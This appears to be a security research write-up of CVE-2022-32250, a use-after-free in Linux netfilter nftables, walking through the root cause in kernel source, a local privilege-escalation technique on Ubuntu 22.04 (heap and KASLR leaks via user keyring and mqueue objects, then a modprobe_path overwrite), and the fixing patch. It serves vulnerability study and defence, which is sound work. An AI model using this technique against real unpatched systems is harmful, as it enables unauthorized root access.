Background

Netfilter is a framework in the Linux kernel for implementing various networking-related tasks with user-defined handlers. Netfilter provides various functions for packet filtering, network address translation and port translation, and packet logging. Netfilter represents a set of hooks that allow other kernel modules to register callback functions in the kernel’s networking stack.

nftables is a component of Netfilter that filters or reroutes packets according to user-defined rules. nftables supports sets to make it easier to use multiple IP addresses, port numbers, etc. in a single rule. sets can be represented using braces when defining rules (e.g., {22, 80, 443}), and sets types include ipv4_addr, ipv6_addr, ether_addr, inet_proto, inet_service, and mark.

nftables have tables, chains, rules, and expressions to store and process instructions. tables contain several chains and are linked to protocols such as IP and IP6. chains include several rules and the types of network traffic information to be processed. rules contain several expressions, and the information received by chains is evaluated as rules inside chains. expressions evaluate whether the input satisfies a set of conditions. How-The-Tables-Have-Turned-CVE-2022-1015-1016

Root Cause Analysis

PoC referenced oss-security - Linux Kernel use-after-free write in netfilter

CVE-2022-32250 is a use-after-free vulnerability in the Netfilter subsystem. The vulnerability occurs when a new nftset is added with a NFT_MSG_NEWSET command. When processing lookup and dynset expressions, freed chunk remains in set->binding list due to an incorrect NFT_STATEFUL_EXPR check. For this reason, use-after-free write occurs.

This vulnerability starts from nft_expr_init. nft_expr_init calls nf_tables_expr_parse and allocates memory for an expr. Afterwards, nf_tables_newexpr initializes expr.

static struct nft_expr *nft_expr_init(const struct nft_ctx *ctx,
                      const struct nlattr *nla)
{
    struct nft_expr_info expr_info;
    struct nft_expr *expr;
    struct module *owner;
    int err;

    err = nf_tables_expr_parse(ctx, nla, &expr_info);
    if (err < 0)
        goto err1;

    err = -ENOMEM;
    expr = kzalloc(expr_info.ops->size, GFP_KERNEL);
    if (expr == NULL)
        goto err2;

    err = nf_tables_newexpr(ctx, &expr_info, expr);
    if (err < 0)
        goto err3;

    return expr;
err3:
    kfree(expr);
err2:
    owner = expr_info.ops->type->owner;
    if (expr_info.ops->type->release_ops)
        expr_info.ops->type->release_ops(expr_info.ops);

    module_put(owner);
err1:
    return ERR_PTR(err);
}

Since the structure is different depending on the type of expr, a suitable structure is stored in data[]. For example, the lookup expression contains struct nft_lookup in data[]

struct nft_expr {
    const struct nft_expr_ops   *ops;
    unsigned char           data[]
        __attribute__((aligned(__alignof__(u64))));
};

struct nft_lookup {
    struct nft_set * set;
    u8 sreg;
    u8 dreg;
    bool invert;
    struct nft_set_binding binding;
};

struct nft_set_binding {
    struct list_head list;
    const struct nft_chain * chain;
    u32 flags;
};

nf_tables_newexpr calls ops->init by referring to ops of expr. In the case of lookup, ops->init contains nft_lookup_init.

static int nf_tables_newexpr(const struct nft_ctx *ctx,
                 const struct nft_expr_info *expr_info,
                 struct nft_expr *expr)
{
    const struct nft_expr_ops *ops = expr_info->ops;
    int err;

    expr->ops = ops;
    if (ops->init) {
        err = ops->init(ctx, expr, (const struct nlattr **)expr_info->tb);
        if (err < 0)
            goto err1;
    }

    return 0;
err1:
    expr->ops = NULL;
    return err;
}

nft_lookup_init calls nf_tables_bind_set. nf_tables_bind_set binds the expr in set->binding at [1].

static int nft_lookup_init(const struct nft_ctx *ctx,
               const struct nft_expr *expr,
               const struct nlattr * const tb[])
{
    struct nft_lookup *priv = nft_expr_priv(expr);
    u8 genmask = nft_genmask_next(ctx->net);
    struct nft_set *set;
    u32 flags;
    int err;

    if (tb[NFTA_LOOKUP_SET] == NULL ||
        tb[NFTA_LOOKUP_SREG] == NULL)
        return -EINVAL;

    set = nft_set_lookup_global(ctx->net, ctx->table, tb[NFTA_LOOKUP_SET],
                    tb[NFTA_LOOKUP_SET_ID], genmask);
    if (IS_ERR(set))
        return PTR_ERR(set);

    ...

    priv->binding.flags = set->flags & NFT_SET_MAP;

    err = nf_tables_bind_set(ctx, set, &priv->binding);
    if (err < 0)
        return err;

    priv->set = set;
    return 0;
}

int nf_tables_bind_set(const struct nft_ctx *ctx, struct nft_set *set,
               struct nft_set_binding *binding)
{
    struct nft_set_binding *i;
    struct nft_set_iter iter;

    if (set->use == UINT_MAX)
        return -EOVERFLOW;

    if (!list_empty(&set->bindings) && nft_set_is_anonymous(set))
        return -EBUSY;

    ...

bind:                                                       // [1] bind expr to set->binding
    binding->chain = ctx->chain;
    list_add_tail_rcu(&binding->list, &set->bindings);
    nft_set_trans_bind(ctx, set);
    set->use++;

    return 0;

When the execution of the nft_expr_init is completed, it returns to the caller: nft_set_elem_expr_alloc. If expr->ops->type->flags is not NFT_EXPR_STATEFUL, go to err_set_elem_expr and call nft_expr_destroy to remove the expression added to set.

struct nft_expr *nft_set_elem_expr_alloc(const struct nft_ctx *ctx,
                     const struct nft_set *set,
                     const struct nlattr *attr)
{
    struct nft_expr *expr;
    int err;

    expr = nft_expr_init(ctx, attr);
    if (IS_ERR(expr))
        return expr;

    err = -EOPNOTSUPP;
    if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL))
        goto err_set_elem_expr;

    if (expr->ops->type->flags & NFT_EXPR_GC) {
        if (set->flags & NFT_SET_TIMEOUT)
            goto err_set_elem_expr;
        if (!set->ops->gc_init)
            goto err_set_elem_expr;
        set->ops->gc_init(set);
    }

    return expr;

err_set_elem_expr:
    nft_expr_destroy(ctx, expr);
    return ERR_PTR(err);
}

nf_tables_bind_set is linked to expr, so call nf_tables_expr_destroy to remove it.

void nft_expr_destroy(const struct nft_ctx *ctx, struct nft_expr *expr)
{
    nf_tables_expr_destroy(ctx, expr);
    kfree(expr);
}

nf_tables_expr_destroy calls expr->ops->destroy. For lookup expression, ops->destroy contains nft_lookup_destroy.

static void nf_tables_expr_destroy(const struct nft_ctx *ctx,
                   struct nft_expr *expr)
{
    const struct nft_expr_type *type = expr->ops->type;

    if (expr->ops->destroy)
        expr->ops->destroy(ctx, expr);
    module_put(type->owner);
}

nft_lookup_destroy calls nf_tables_destroy_set and nf_tables_destroy_set tries to destroy set. However, &set->bindings contain the previously assigned expr, so nft_set_destroy cannot be called. Therefore, the set remains as it is, and the allocated expr still exists in the binding of the set.

static void nft_lookup_destroy(const struct nft_ctx *ctx,
                   const struct nft_expr *expr)
{
    struct nft_lookup *priv = nft_expr_priv(expr);

    nf_tables_destroy_set(ctx, priv->set);
}

void nf_tables_destroy_set(const struct nft_ctx *ctx, struct nft_set *set)
{
    if (list_empty(&set->bindings) && nft_set_is_anonymous(set))
        nft_set_destroy(ctx, set);
}

Although expr remains in the list, nft_expr_destroy frees the assigned expr at [2]. So, if we try to bind another expr to that set again, use-after-free write will occur.

void nft_expr_destroy(const struct nft_ctx *ctx, struct nft_expr *expr)
{
    nf_tables_expr_destroy(ctx, expr);
    kfree(expr);                            // [2] UAF occurred!
}

Exploitation

The exploitation is performed on Ubuntu 22.04 with a 5.15.0-27-generic kernel.

The exploit has three main steps:

Leak the heap address using struct user_key_payload.
Leak text address using mqueue to get KASLR.
Overwrite modprobe_path.

Leak Heap Address

For Linux kernel exploitation, struct msg_msg is the widely used primitive since it can perform both arbitrary reads and write by modifying the size field.

On the 5.15.0-27-generic kernel, struct msg_msg is allocated to GFP_KERNEL_ACCOUNT, while the struct nft_lookup is allocated to the GFP_KERNEL. If the GFP_KERNEL_ACCOUNT flag is set, the kernel will use the kmalloc-cg-xx slab. Otherwise, the kernel will use the kmalloc-xx slab if the GFP_KERNEL flag is set.

For this reason, we used user keyring to leak information. CVE-2022-34918-LPE-PoC

User keyring uses struct user_key_payload and it has the following structure. We can control the size of struct user_key_payload by changing the datalen.

struct user_key_payload {
    struct rcu_head rcu;
    unsigned short  datalen;
    char        data[] __aligned(__alignof__(u64));
};

struct callback_head {
    struct callback_head *next;
    void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));
#define rcu_head callback_head

struct user_key_payload is allocated from user_preparse.

int user_preparse(struct key_preparsed_payload *prep)
{
    struct user_key_payload *upayload;
    size_t datalen = prep->datalen;

    if (datalen <= 0 || datalen > 32767 || !prep->data)
        return -EINVAL;

    upayload = kmalloc(sizeof(*upayload) + datalen, GFP_KERNEL);
    if (!upayload)
        return -ENOMEM;

    ...

    return 0;
}

struct user_key_payload overlaps with the UAF’d chunk generated as described previously. user_key_payload has a data field that starts from 0x18, so arbitrary R/W is possible. Also, the UAF chunk (struct nft_lookup) has a linked list. For this reason, if UAF is triggered twice, the second UAF address is written at the linked list location of the chunk where the UAF first occurred. Therefore, using UAF write, another UAF address is written to nft_lookup->binding->next. It corresponds to the user_key_payload->data[0:8] field. Consequently, it is possible to leak heap addresses by reading user_key_payload->data.

struct user_key_payload {
    struct rcu_head rcu;        /* 0    10*/
    unsigned short  datalen;    /* 10   2 */
    /*          padding         */
    char    data[] __aligned(__alignof__(u64)); /* 18   -- */
};

Leak KASLR

msg_msg is widely used to exploit the Linux kernel. However, this vulnerability is only possible to write an object’s 0x18 field, so it is hard to exploit with the existing method.

However, in the Linux kernel source code, mqueue has functions suitable for exploitation. mqueue manages multiple messages, and they are managed by struct posix_msg_tree_node. It is allocated from [3].

static int do_mq_timedsend(mqd_t mqdes, const char __user *u_msg_ptr,
        size_t msg_len, unsigned int msg_prio,
        struct timespec64 *ts)
{
    struct fd f;
    struct inode *inode;
    struct ext_wait_queue wait;
    struct ext_wait_queue *receiver;
    struct msg_msg *msg_ptr;
    struct mqueue_inode_info *info;
    ktime_t expires, *timeout = NULL;
    struct posix_msg_tree_node *new_leaf = NULL;
    int ret = 0;
    DEFINE_WAKE_Q(wake_q);

    if (unlikely(msg_prio >= (unsigned long) MQ_PRIO_MAX))
        return -EINVAL;

    if (ts) {
        expires = timespec64_to_ktime(*ts);
        timeout = &expires;
    }

    ...

    msg_ptr = load_msg(u_msg_ptr, msg_len);
    if (IS_ERR(msg_ptr)) {
        ret = PTR_ERR(msg_ptr);
        goto out_fput;
    }
    msg_ptr->m_ts = msg_len;
    msg_ptr->m_type = msg_prio;

    if (!info->node_cache)
        new_leaf = kmalloc(sizeof(*new_leaf), GFP_KERNEL);  // [3] allocate new_leaf
    ...

struct posix_msg_tree_node is allocated in kmalloc-64 and it is implemented as follows. The size of struct rb_node is 0x18 so msg_list->next has an offset of 0x18.

struct posix_msg_tree_node {
    struct rb_node      rb_node;
    struct list_head    msg_list;
    int         priority;
};

struct rb_node {
    unsigned long  __rb_parent_color;
    struct rb_node *rb_right;
    struct rb_node *rb_left;
} __attribute__((aligned(sizeof(long))));

In the figure below, UAF 1 and UAF 2 are the first and second use-after-free’d struct nft_expr, respectively. Each struct nft_expr contains struct nft_lookup in nft_expr->data.

If we allocate UAF 1 and UAF 2 in a particular order, they will be connected as shown below.

Allocate UAF 1 chunk with the vulnerability.
Overwrite struct posix_msg_tree_node to UAF 1 by using do_mq_timedsend function.
Write (UAF 1)->binding->next = (UAF 2)->binding and create UAF 2.
Overwrite struct user_key_payload to UAF 2 by using the keyctl function.

                      UAF 1                                       UAF 2
         -------------------------------             -------------------------------
0x0     |    rb color   |    rb_right   |           |   rcu->next   | rcu->func ptr |
         --------------- ---------------             --------------- ---------------
0x10    |    rb_left    |  (UAF 2+0x18) |           |   data_len    |     data[0]   |
         --------------- ---------------             --------------- ---------------
0x20    |      ....     |      ....     |           |     data[1]   |     data[2]   |
         --------------- ---------------             --------------- ---------------
0x30    |      ....     |      ....     |           |     data[3]   |     data[4]   |
         --------------- ---------------             --------------- ---------------

UAF 1 overlap info: struct nft_expr == struct posix_msg_tree_node
UAF 2 overlap info: struct nft_expr == struct user_key_payload

In this case, msg_list->next of struct posix_msg_tree_node becomes UAF 2+0x18, and msg_list connected with struct msg_msg list. Therefore, the data[] in UAF 2 is the same as overlapped with struct msg_msg. It is organized as follows:

data[0] = m_list->next   /   data[1] = m_list->prev   /   data[2] = m_type   /   data[3] = m_ts

struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts;        /* message text size */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately */
};

Accordingly, the structure of struct msg_msg can be modified. However, in the case of copy_to_user, it is impossible to copy more than their slab size (currently kmalloc-64). Therefore, KASLR is leaked only when appropriate structures are allocated below UAF 2.

Previously, struct percpu_ref_data was used for the KASLR leak of kmalloc-64. Unfortunately, kfree(msg_msg->security) is performed at free_msg function. If struct percpu_ref_data is allocated below UAF 2, kernel crash occurs at free(count) because the count assigned by the io_uring functions is 0x800000000000000001. Therefore, we use struct user_key_payload again.

struct percpu_ref_data {
    atomic_long_t       count;
    percpu_ref_func_t   *release;
    percpu_ref_func_t   *confirm_switch;
    bool            force_atomic:1;
    bool            allow_reinit:1;
    struct rcu_head     rcu;
    struct percpu_ref   *ref;
};

In struct user_key_payload, struct rcu_head exists. struct rcu_head is a structure designed to wait for a critical section to be terminated. When the critical section is terminated, a callback function (rcu->func()) is called. rcu_head stores another rcu_head address at the next pointer.

Therefore, if this chunk exists below UAF 2, a KASLR leak can be performed.

struct user_key_payload {
    struct rcu_head rcu;
    unsigned short  datalen;
    char        data[] __aligned(__alignof__(u64));
};

struct callback_head {
    struct callback_head *next;
    void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));
#define rcu_head callback_head

The function do_mq_timedreceive is used to read the struct msg_msg inside the mqueue. do_mq_timedreceive calls msg_get to get struct msg_msg [4]. msg_get refers to the leaf node to get the first struct msg_msg [5] and calls list_del [6] to unlink the first struct msg_msg from the linked list.

Afterward, store_msg executes copy_to_user to send the data [7]. Then, free_msg frees struct msg_msg and msg_msg->security [8]. KASLR leak is possible because msg_msg->data contains a function address: rcu->func.

static int do_mq_timedreceive(mqd_t mqdes, char __user *u_msg_ptr,
        size_t msg_len, unsigned int __user *u_msg_prio,
        struct timespec64 *ts)
{
    ssize_t ret;
    struct msg_msg *msg_ptr;
    struct fd f;
    struct inode *inode;
    struct mqueue_inode_info *info;
    struct ext_wait_queue wait;
    ktime_t expires, *timeout = NULL;
    struct posix_msg_tree_node *new_leaf = NULL;

    if (ts) {
        expires = timespec64_to_ktime(*ts);
        timeout = &expires;
    }
    ...

    else {
        DEFINE_WAKE_Q(wake_q);

        msg_ptr = msg_get(info);                                        // [4] try to get msg_msg from leaf node

        inode->i_atime = inode->i_mtime = inode->i_ctime =
                current_time(inode);

        /* There is now free space in the queue. */
        pipelined_receive(&wake_q, info);
        spin_unlock(&info->lock);
        wake_up_q(&wake_q);
        ret = 0;
    }
    if (ret == 0) {
        ret = msg_ptr->m_ts;

        if ((u_msg_prio && put_user(msg_ptr->m_type, u_msg_prio)) ||
            store_msg(u_msg_ptr, msg_ptr, msg_ptr->m_ts)) {             // [7] read data from msg_msg, call copy_to_user
            ret = -EFAULT;
        }
        free_msg(msg_ptr);                                              // [8] kfree msg_msg and msg_msg->security
    }
out_fput:
    fdput(f);
out:
    return ret;
}

static inline struct msg_msg *msg_get(struct mqueue_inode_info *info)
{
    struct rb_node *parent = NULL;
    struct posix_msg_tree_node *leaf;
    struct msg_msg *msg;

try_again:
    /*
     * During insert, low priorities go to the left and high to the
     * right.  On receive, we want the highest priorities first, so
     * walk all the way to the right.
     */
    parent = info->msg_tree_rightmost;

    ...

    } else {
        msg = list_first_entry(&leaf->msg_list,                     // [5] extract msg_msg at the front of list
                       struct msg_msg, m_list);
        list_del(&msg->m_list);                                     // [6] remove msg_msg from list
        if (list_empty(&leaf->msg_list)) {
            msg_tree_erase(leaf, info);
        }
    }
    info->attr.mq_curmsgs--;
    info->qsize -= msg->m_ts;
    return msg;
}

modprobe PATH overwrite

In the msg_get function, list_del unlinks struct msg_msg from the linked list. In this case, msg->prev->next=msg->next, msg->next->prev=msg->prev linking occurs.

                      UAF 1                                       UAF 2
         -------------------------------             -------------------------------
0x0     |    rb color   |    rb_right   |           |   rcu->next   | rcu->func ptr |
         --------------- ---------------             --------------- ---------------
0x10    |    rb_left    |  (UAF 2+0x18) |           |   data_len    |     data[0]   |
         --------------- ---------------             --------------- ---------------
0x20    |      ....     |      ....     |           |     data[1]   |     data[2]   |
         --------------- ---------------             --------------- ---------------
0x30    |      ....     |      ....     |           |     data[3]   |     data[4]   |
         --------------- ---------------             --------------- ---------------

UAF 1 overlap info: struct nft_expr == struct posix_msg_tree_node
UAF 2 overlap info: struct nft_expr == struct user_key_payload

data[0] = m_list->next   /   data[1] = m_list->prev   /   data[2] = m_type   /   data[3] = m_ts

struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts;        /* message text size */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately */
};

The base address of the kernel’s heap is 0xffff????00000000. Therefore, we can write 0xffff????(our input) at any kernel address.

modprobe_path contains /sbin/modprobe initially, so if the data[0] and data[1] have modified structure as (modprobe_path + 0x1 - 0x8) and 0xffff????2f706d74, we can write 0xffff????2f706d74 in modprobe_path + 0x1 (0x2f706d74 is /pmt). Also, we already know ???? from heap leak.

As a result, modprobe_path can be changed into /tmp/????\xff\xffprobe.

Full exploit code is available at our GitHub repo. Note that this is only intended for educational/research purpose and you may not use it to cause any harm or damage.

Patch

nft_expr_init should check expr_info.ops->type->flags. Allocate expr chunk only when the flag is NFT_EXPR_STATEFUL.

diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
index 12fc9cda4a2cf..f296dfe86b622 100644
--- a/net/netfilter/nf_tables_api.c
+++ b/net/netfilter/nf_tables_api.c
@@ -2873,27 +2873,31 @@ static struct nft_expr *nft_expr_init(const struct nft_ctx *ctx,

    err = nf_tables_expr_parse(ctx, nla, &expr_info);
    if (err < 0)
-       goto err1;
+       goto err_expr_parse;
+
+   err = -EOPNOTSUPP;
+   if (!(expr_info.ops->type->flags & NFT_EXPR_STATEFUL))
+       goto err_expr_stateful;

    err = -ENOMEM;
    expr = kzalloc(expr_info.ops->size, GFP_KERNEL_ACCOUNT);        // Commit kernel version is higher.
    if (expr == NULL)                                               // So it just written as GFP_KERNEL_ACCOUNT
-       goto err2;
+       goto err_expr_stateful;

    err = nf_tables_newexpr(ctx, &expr_info, expr);
    if (err < 0)
-       goto err3;
+       goto err_expr_new;

    return expr;
-err3:
+err_expr_new:
    kfree(expr);
-err2:
+err_expr_stateful:
    owner = expr_info.ops->type->owner;
    if (expr_info.ops->type->release_ops)
        expr_info.ops->type->release_ops(expr_info.ops);

    module_put(owner);
-err1:
+err_expr_parse:
    return ERR_PTR(err);
 }

@@ -5413,9 +5417,6 @@ struct nft_expr *nft_set_elem_expr_alloc(const struct nft_ctx *ctx,
        return expr;

    err = -EOPNOTSUPP;
-   if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL))
-       goto err_set_elem_expr;
-
    if (expr->ops->type->flags & NFT_EXPR_GC) {
        if (set->flags & NFT_SET_TIMEOUT)
            goto err_set_elem_expr;

Conclusion

In this post, we have shown the process of exploiting CVE-2022-32250. We were able to leak KASLR and overwrite modprobe_path by utilizing the mqueue functions, and as a result, we successfully gained root privileges in Ubuntu 22.04.

CVE-2022-32250 _ Exploit Linux Kernel Exploit with mqueue